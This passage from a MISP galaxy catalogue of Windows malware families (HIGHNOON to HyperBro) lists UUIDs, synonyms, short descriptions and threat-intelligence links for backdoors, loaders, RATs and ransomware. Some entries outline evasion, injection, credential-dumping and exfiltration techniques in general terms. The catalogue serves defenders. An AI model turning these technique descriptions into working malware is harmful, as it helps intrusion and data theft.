- https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html - webarchive
- http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-twilight - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HIGHNOON
According to FireEye, HIGHNOON is a backdoor that may consist of multiple components. The components may include a loader, a DLL, and a rootkit. Both the loader and the DLL may be dropped together, but the rootkit may be embedded in the DLL. The HIGHNOON loader may be designed to run as a Windows service.
Internal MISP references
UUID f04c5821-311f-44c9-9d6c-0fe3fd3a1336
which can be used as unique global reference for HIGHNOON
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon - webarchive
- https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html - webarchive
- https://content.fireeye.com/apt-41/rpt-apt41/ - webarchive
- https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021 - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://twitter.com/MrDanPerez/status/1159461995013378048 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HIGHNOON.BIN
Internal MISP references
UUID 0a86eb46-28b5-4797-af63-75f9b2ef9080
which can be used as unique global reference for HIGHNOON.BIN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HIGHNOTE
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HIGHNOTE.
Known Synonyms |
---|
ChyNode |
Internal MISP references
UUID d9f03a69-507d-4b1d-af6d-e76fca5952b7
which can be used as unique global reference for HIGHNOTE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HijackLoader
According to Rapid7, this is a loader first spotted in July 2023. It implements several evasion techniques including Process Doppelgänging, DLL Search Order Hijacking, and Heaven's Gate. It has been observed to store its malicious payload in the IDAT chunk of the PNG file format.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HijackLoader.
Known Synonyms |
---|
DOILoader |
GHOSTPULSE |
IDAT Loader |
SHADOWLADDER |
Internal MISP references
UUID cbba3bc7-9491-402c-af3b-9a15b8bce122
which can be used as unique global reference for HijackLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hijackloader - webarchive
- https://www.esentire.com/blog/danabots-latest-move-deploying-icedid - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn - webarchive
- https://web.archive.org/web/20231219110155/https://yoroi.company/en/research/innovation-in-cyber-intrusions-the-evolution-of-ta544/ - webarchive
- https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution - webarchive
- https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-widely-abused-msix-app-installer-disabled-by-microsoft-active-iocs/ - webarchive
- https://alpine-sec.medium.com/hijackloader-targets-hotels-a-technical-analysis-c2795fc4f3a3 - webarchive
- https://www.elastic.co/security-labs/tricks-and-treats - webarchive
- https://www.trellix.com/blogs/research/how-attackers-repackaged-a-threat-into-something-that-looked-benign/ - webarchive
- https://www.loginsoft.com/post/blue-screen-mayhem-when-crowdstrikes-glitch-became-threat-actors-playground - webarchive
- https://www.zscaler.com/blogs/security-research/hijackloader-updates - webarchive
- https://www.crowdstrike.com/blog/hijackloader-expands-techniques/ - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader - webarchive
- https://securelist.com/tusk-infostealers-campaign/113367/ - webarchive
- https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HiKit
Internal MISP references
UUID 35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1
which can be used as unique global reference for HiKit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-keystone - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf - webarchive
- https://www.recordedfuture.com/hidden-lynx-analysis/ - webarchive
- https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware - webarchive
- https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware - webarchive
- https://attack.mitre.org/groups/G0001/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HILDACRYPT
A new ransomware family was discovered in August 2019. Called HILDACRYPT, it is named after the Netflix cartoon “Hilda” because the TV show’s YouTube trailer was included in the ransom note of the original version of the malware.
Internal MISP references
UUID fb637fc1-c06b-4b68-b261-0e1c0bd1e17b
which can be used as unique global reference for HILDACRYPT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hildacrypt - webarchive
- https://blog.sonicwall.com/en-us/2019/11/mindhunter-meeting-a-russian-ransomware-cell/ - webarchive
- https://www.acronis.com/en-eu/blog/posts/popular-backup-solutions-easily-disabled-recent-hildacrypt-ransomware/ - webarchive
- https://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/ - webarchive
- https://securitynews.sonicwall.com/xmlpost/hildacrypt-ransomware-actively-spreading-in-the-wild/ - webarchive
- https://youtu.be/Oqg20dF8tTA - webarchive
- https://www.bleepingcomputer.com/news/security/hildacrypt-ransomware-developer-releases-decryption-keys/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
himan
Internal MISP references
UUID ecad37b9-555a-4029-b181-6f272eed7154
which can be used as unique global reference for himan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Himera Loader
Internal MISP references
UUID b5e83cab-8096-40de-8a5b-5bf0f2e336b2
which can be used as unique global reference for Himera Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hisoka
Internal MISP references
UUID b6734ca0-599f-4992-9094-218d01ddfb3a
which can be used as unique global reference for Hisoka
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hive (Windows)
Hive is a strain of ransomware that was first discovered in June 2021. Hive was designed to be used by Ransomware-as-a-Service providers, to enable novice cyber-criminals to launch ransomware attacks on healthcare providers, energy providers, charities, and retailers across the globe. In 2022 the codebase was switched from Go to Rust.
Internal MISP references
UUID 4aaa039f-6239-46d8-850d-69e9cbd12e9e
which can be used as unique global reference for Hive (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hive - webarchive
- https://unit42.paloaltonetworks.com/emerging-ransomware-groups/ - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/ - webarchive
- https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html - webarchive
- https://arxiv.org/pdf/2202.08477.pdf - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098 - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/ - webarchive
- https://www.ic3.gov/Media/News/2021/210825.pdf - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf - webarchive
- https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_hive_2021_v1.pdf - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf - webarchive
- https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - webarchive
- https://securelist.com/modern-ransomware-groups-ttps/106824/ - webarchive
- https://www.varonis.com/blog/hive-ransomware-analysis - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/ - webarchive
- https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group - webarchive
- https://labs.sentinelone.com/hive-attacks-analysis-of-the-human-operated-ransomware-targeting-healthcare/ - webarchive
- https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/ - webarchive
- https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/ - webarchive
- https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html - webarchive
- https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/ - webarchive
- https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf - webarchive
- https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/ - webarchive
- https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again - webarchive
- https://www.connectwise.com/resources/hive-profile - webarchive
- https://github.com/reecdeep/HiveV5_file_decryptor - webarchive
- https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html - webarchive
- https://github.com/rivitna/Malware/tree/main/Hive - webarchive
- https://resources.prodaft.com/wazawaka-report - webarchive
- https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/ - webarchive
- https://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/ - webarchive
- https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf - webarchive
- https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals - webarchive
- https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape - webarchive
- https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/ - webarchive
- https://blog.group-ib.com/hive - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hi-Zor RAT
Internal MISP references
UUID 80987ce7-7eb7-4e55-95f8-5c7a9441acab
which can be used as unique global reference for Hi-Zor RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HLUX
Internal MISP references
UUID 8e056957-f28b-4b2f-bf58-6b2f7fdd7d62
which can be used as unique global reference for HLUX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hodur
Internal MISP references
UUID 6dec4a6e-9a33-4f1e-94fc-5e34916b968f
which can be used as unique global reference for Hodur
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hodur - webarchive
- https://github.com/Still34/landing/blob/master/assets/slides/2024-08-Sailing%20the%20Seven%20SEAs.pdf - webarchive
- https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/ - webarchive
- https://files.speakerdeck.com/presentations/6d01e26c85a444d0a3f888e45629635f/hodur_recon2024.pdf - webarchive
- https://hitcon.org/2024/CMT/slides/Sailing_the_Seven_SEAs_Deep_Dive_into_Polaris_Arsenal_and_Intelligence_Insights.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Holcus Installer (Adware)
Adware, tied to the eGobbler and Nephos7 campaigns.
Internal MISP references
UUID 379356c7-ec7a-4880-85d5-afe9608d6b60
which can be used as unique global reference for Holcus Installer (Adware)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HOLERUN
Internal MISP references
UUID 1860127d-41cf-4fe8-a58c-9f5304b91fb1
which can be used as unique global reference for HOLERUN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
homefry
A 64-bit Windows password dumper/cracker that has previously been used in conjunction with the AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR 0x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and the malware version for each login session.
Internal MISP references
UUID 1fb57e31-b97e-45c3-a922-a49ed6dd966d
which can be used as unique global reference for homefry
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry - webarchive
- https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HookInjEx
Internal MISP references
UUID b614f291-dbf8-49ed-b110-b69ab6e8c6e5
which can be used as unique global reference for HookInjEx
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HOPLIGHT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HOPLIGHT.
Known Synonyms |
---|
HANGMAN |
Internal MISP references
UUID 3e489132-8687-46b3-b9a7-74ba8fafaddf
which can be used as unique global reference for HOPLIGHT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/ar20-045g - webarchive
- https://www.secureworks.com/research/threat-profiles/nickel-academy - webarchive
- https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/ - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/ar19-304a - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/AR19-100A - webarchive
- https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hopscotch
Hopscotch is part of the Regin framework.
Internal MISP references
UUID 0ab4f3ce-5474-4b1e-8ad9-b9ad80e75be8
which can be used as unique global reference for Hopscotch
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HorusEyes RAT
Remote Access Tool written in VB.NET.
Internal MISP references
UUID cbe47d19-2f74-4dbc-84b5-44c31518c8a7
which can be used as unique global reference for HorusEyes RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Horus Eyes RAT
Warsaw trojan is a new banking trojan based on the Horus Eyes RAT core engine.
Internal MISP references
UUID 5a368326-d594-4a9b-94ff-7e2d41158006
which can be used as unique global reference for Horus Eyes RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HOTCROISSANT
Internal MISP references
UUID 4500694c-d71a-4d11-8f9c-0036156826b6
which can be used as unique global reference for HOTCROISSANT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/ar20-045d - webarchive
- https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/ - webarchive
- https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HOTWAX
HOTWAX is a module that upon starting imports all necessary system API functions, and searches for a .CHM file. HOTWAX decrypts a payload using the Spritz algorithm with a hard-coded key and then searches the target process and attempts to inject the decrypted payload module from the CHM file into the address space of the target process.
Internal MISP references
UUID d5391c00-9a75-457c-9ef0-0a75c5df8348
which can be used as unique global reference for HOTWAX
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax - webarchive
- https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf - webarchive
- https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
- https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/ - webarchive
- https://securelist.com/lazarus-under-the-hood/77908/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Houdini
Houdini is a VBS-based RAT dating back to 2013. Back in the day it used to be wrapped in an .exe, but in 2018 it started being spamvertised or downloaded by other malware directly as a .vbs file. In 2019, WSHRAT appeared, a JavaScript-based version of Houdini recoded under the name Kognito.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Houdini.
Known Synonyms |
---|
Hworm |
Jenxcus |
Kognito |
Njw0rm |
WSHRAT |
dinihou |
dunihi |
Internal MISP references
UUID 11775f11-03a0-4ba8-932f-c125dfb66e35
which can be used as unique global reference for Houdini
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini - webarchive
- http://blogs.360.cn/post/analysis-of-apt-c-37.html - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt - webarchive
- https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/ - webarchive
- https://www.youtube.com/watch?v=XDAiS6KBDOs - webarchive
- https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g - webarchive
- https://lab52.io/blog/wirte-group-attacking-the-middle-east/ - webarchive
- https://threatpost.com/ta2541-apt-rats-aviation/178422/ - webarchive
- https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/ - webarchive
- https://blogs.360.cn/post/APT-C-44.html - webarchive
- https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html - webarchive
- https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/ - webarchive
- https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated - webarchive
- https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape - webarchive
- https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md - webarchive
- https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html - webarchive
- https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/ - webarchive
- https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns - webarchive
- https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/ - webarchive
- https://cofense.com/houdini-worm-transformed-new-phishing-attack/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37 - webarchive
- https://www.youtube.com/watch?v=h3KLKCdMUUY - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html - webarchive
- https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks - webarchive
- http://blog.morphisec.com/hworm-houdini-aka-njrat - webarchive
- https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HtBot
Internal MISP references
UUID 246f62ee-854a-45e9-8c57-34f1fb72762f
which can be used as unique global reference for HtBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
htpRAT
Internal MISP references
UUID e8d1a1f3-3170-4562-9a18-cadf000e48d0
which can be used as unique global reference for htpRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HTran
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HTran.
Known Synonyms |
---|
HUC Packet Transmit Tool |
Internal MISP references
UUID 3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8
which can be used as unique global reference for HTran
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.htran - webarchive
- https://www.secureworks.com/research/htran - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mayfair - webarchive
- https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - webarchive
- https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/ - webarchive
- https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html - webarchive
- https://blog.talosintelligence.com/new-zardoor-backdoor/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ - webarchive
- https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/ - webarchive
- https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HttpBrowser
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HttpBrowser.
Known Synonyms |
---|
HttpDump |
Internal MISP references
UUID 79f93d04-f6c8-4705-9395-7f575a61e82f
which can be used as unique global reference for HttpBrowser
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/ - webarchive
- https://attack.mitre.org/groups/G0026 - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/ - webarchive
- https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-union - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
httpdropper
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular httpdropper.
Known Synonyms |
---|
httpdr0pper |
Internal MISP references
UUID 78336551-c18e-47ac-8bef-1c0c61c0e0a9
which can be used as unique global reference for httpdropper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf - webarchive
- https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787 - webarchive
- http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HTTPSnoop
Cisco Talos states that HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HTTPSnoop.
Known Synonyms |
---|
TOFULOAD |
Internal MISP references
UUID f585fba9-4a75-4752-bfdd-a0049e4d8d63
which can be used as unique global reference for HTTPSnoop
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HTTP(S) uploader
The HTTP(S) uploader is a Lazarus tool responsible for data exfiltration, by using the HTTP or HTTPS protocols.
It accepts up to 10 command line parameters: a 29-byte decryption key, a C&C for data exfiltration, the name of a local RAR split volume, the name of the multivolume archive on the server side, the size of a RAR split (max 200,000 kB), the starting index of a split, the ending index of a split, and the switch -p with a proxy IP address and port.
Internal MISP references
UUID 50723d62-ecf2-49de-9ce2-911045ae63f0
which can be used as unique global reference for HTTP(S) uploader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsuploader - webarchive
- https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf - webarchive
- https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/ - webarchive
- https://securelist.com/lazarus-threatneedle/100803/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
http_troy
Internal MISP references
UUID 339b3e7c-7a4a-4a1a-94b6-555f15a0b265
which can be used as unique global reference for http_troy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HUI Loader
A loader that has been used by multiple threat actor groups since 2015.
Internal MISP references
UUID 1cb6ed37-3017-45b9-b186-1e16d46a8dd2
which can be used as unique global reference for HUI Loader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hui_loader - webarchive
- https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/ - webarchive
- https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html - webarchive
- https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader - webarchive
- https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf - webarchive
- https://medium.com/@morimolymoly/hui-loader-malware-analysis-note-4fa0e1c791d3 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hunter Stealer
Internal MISP references
UUID c93fdbb9-aafc-441d-a66f-aaf038f10bd3
which can be used as unique global reference for Hunter Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hupigon
Internal MISP references
UUID 40157734-eb33-4187-bcc8-2cd168db6fda
which can be used as unique global reference for Hupigon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HuskLoader
Internal MISP references
UUID 06649edb-d078-4403-a628-6295d1bc4ad8
which can be used as unique global reference for HuskLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Hussar
Internal MISP references
UUID d3d86184-3c5c-478b-8f8b-f56f1a02247d
which can be used as unique global reference for Hussar
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HxDef
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular HxDef.
Known Synonyms |
---|
HacDef |
HackDef |
HackerDefender |
Internal MISP references
UUID 906adc27-757d-42bd-b8a2-f8a134077343
which can be used as unique global reference for HxDef
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HyperBro
HyperBro is a RAT that has been observed to target primarily the gambling industry, though it has been spotted in other places as well. The malware typically consists of three or more components: a) a genuine loader, typically with a valid code-signing certificate; b) a malicious DLL loader loaded from the former component via DLL hijacking; c) an encrypted and compressed blob that decrypts to a PE-based payload which has its C2 information hardcoded within.
Internal MISP references
UUID b7f1abd3-870b-42ca-9bd1-5931126c68d5
which can be used as unique global reference for HyperBro
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro - webarchive
- https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/ - webarchive
- https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-union - webarchive
